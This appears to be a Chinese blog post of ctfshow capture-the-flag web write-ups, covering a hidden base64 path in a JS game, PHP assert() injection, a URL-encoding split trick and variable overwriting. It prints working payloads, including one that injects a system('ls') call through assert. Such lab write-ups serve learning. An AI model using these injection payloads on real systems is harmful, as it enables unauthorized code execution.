(WEB)TapTapTap-ctfshow 【JS代码】

这道题跟WEB其实没啥关系。

image

网页游戏类的题目直接查看其源代码。

image

在JS文件中找到一串BASE64编码的字符串。

结合前面的语句,当游戏关数达到20关以上时,会显示一个提示,内容就是这个。

base解码出来:

image

直接访问这个/secret_path_you_do_not_know/secretfile.txt

image

(WEB)一言既出-ctfshow 【assert】

题目:

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
    if ($_GET['num'] == 114514){
        assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
        echo $flag;
    } 
} 

Assert函数可以执行里面的代码,这里可以提前闭合并注释后面的即可绕过。

pyload:

?num=114514);%23

image

2种其它写法(官方WP):

?num=114514);(19199810
?num=114514)==1%20or%20system(%27ls%27);%23

(WEB)驷马难追-ctfshow 【assert】

题目:

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
              echo $flag;
     } 
} function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);

和前一题相比增加了过滤,无法使用闭合了:

image

解法:使用加法运算。

payload:

?num=114514+1805296	//加号要使用url编码,即:
	?num=114514%2B1805296

image

(WEB)化零为整-ctfshow 【RCE】

题目:

<?phphighlight_file(__FILE__);
include "flag.php";$result='';for ($i=1;$i<=count($_GET);$i++){
    if (strlen($_GET[$i])>1){
        die("你太长了!!");
        }
    else{
    $result=$result.$_GET[$i];
    }
}if ($result ==="大牛"){
    echo $flag;
}

中文的url编码长度为3,比如

大的URL编码是:%E5%A4%A7

牛的URL编码是:%E7%89%9B

而第九行代码限制我们一次传值的长度只能为1,于是payload:

?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B

image

(WEB)遍地飘零-ctfshow 【变量覆盖】

题目:

<?php
include "flag.php";
highlight_file(__FILE__);$zeros="000000000000000000000000000000";foreach($_GET as $key => $value){
    $$key=$$value;
}if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零,仔细看看输入有什么问题吧";
    var_dump($_GET);
}

把flag赋值给_GET就可以了:

?_GET=flag

image

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信小程序

微信扫一扫体验

立即
投稿

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部